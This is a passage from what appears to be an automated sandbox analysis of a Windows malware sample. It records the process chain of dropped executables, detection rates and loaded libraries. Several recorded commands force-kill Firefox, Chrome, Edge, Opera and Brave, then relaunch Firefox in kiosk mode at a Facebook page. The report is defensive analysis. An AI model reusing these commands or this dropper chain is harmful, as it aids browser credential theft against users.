INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2616551353.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2604570319.000000001D7E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe Virustotal: Detection: 42%
Source: file.exe ReversingLabs: Detection: 31%
Source: 6IF65DE3AL7UEH5E4W09DIZ.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe "C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe"
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe "C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe "C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42e60347-4193-4a06-98d1-e931f84d08bb} 6604 "\\.\pipe\gecko-crash-server-pipe.6604" 1e752c6cf10 socket
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe "C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe "C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe "C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe "C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe"
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe "C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe "C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe "C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001608001\num.exe "C:\Users\user\AppData\Local\Temp\1001608001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Process created: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe "C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe"
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.facebook.com/video --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2216 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42e60347-4193-4a06-98d1-e931f84d08bb} 6604 "\\.\pipe\gecko-crash-server-pipe.6604" 1e752c6cf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe Section loaded: ncrypt.dll
